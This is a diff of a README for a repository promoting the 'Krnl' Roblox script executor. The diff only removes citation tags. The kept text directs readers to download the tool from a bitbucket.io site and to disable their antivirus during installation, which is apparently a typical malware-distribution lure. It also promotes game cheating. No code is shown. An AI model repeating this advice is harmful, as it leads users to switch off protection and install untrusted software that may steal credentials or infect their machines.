krnl-executor-for-rblx/.github/profile/README.md

 ### 🛡️ Is Krnl Executor Safe?

 While Krnl is widely used and trusted, it's essential to download it from reputable sources like [rotools.bitbucket.io](https://rotools.bitbucket.io).
 Always disable antivirus software during installation to prevent false flags.
 Remember, using any script executor carries risks, including potential Roblox account bans.
-Use responsibly.([Krnl][7])
+Use responsibly.

 ---

 ### 🔄 Regular Updates and Support

 Krnl's development team ensures the executor stays compatible with the latest Roblox updates.
-For support and community discussions, users often refer to forums and Discord channels dedicated to Roblox scripting.([SourceForge][2])
+For support and community discussions, users often refer to forums and Discord channels dedicated to Roblox scripting.

 ---